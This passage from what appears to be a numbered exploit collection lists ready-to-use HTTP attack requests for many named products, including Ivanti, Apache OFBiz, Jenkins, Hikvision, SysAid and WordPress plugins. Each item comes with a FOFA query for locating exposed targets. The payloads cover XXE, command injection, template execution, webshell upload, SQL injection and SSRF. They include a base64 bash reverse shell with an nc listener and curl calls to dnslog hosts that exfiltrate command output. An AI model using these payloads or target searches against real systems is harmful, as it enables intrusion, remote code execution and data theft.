User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Response URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML file:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

